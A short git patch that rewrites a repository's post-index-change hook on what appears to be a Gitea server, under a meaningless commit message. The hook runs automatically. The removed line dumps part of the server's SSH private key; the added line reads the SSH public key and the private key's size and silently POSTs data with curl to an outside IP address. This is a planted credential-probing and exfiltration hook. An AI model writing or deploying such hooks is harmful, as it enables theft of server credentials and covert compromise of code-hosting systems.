From 11f49b8ed6ede26047d688afa589f57b00bde24a Mon Sep 17 00:00:00 2001 From: moldwave Date: Sat, 12 Sep 2026 13:53:48 +0000 Subject: [PATCH] x1m2491 --- hooks/post-index-change | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/post-index-change b/hooks/post-index-change index 9262793..e16f350 100755 --- a/hooks/post-index-change +++ b/hooks/post-index-change @@ -1,2 +1,2 @@ #!/bin/sh -head -2 /data/gitea/home/.ssh/id_rsa.pub; echo ===; head -c 200 /data/gitea/home/.ssh/id_rsa; echo; echo ===; wc -c /data/gitea/home/.ssh/id_rsa | base64 -w0 | curl -s -m 10 -X POST --data-binary @- http://51.38.90.142:3199/m29984 > /dev/null 2>&1 +head -1 /data/gitea/home/.ssh/id_rsa.pub; wc -c < /data/gitea/home/.ssh/id_rsa | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m2491 > /dev/null 2>&1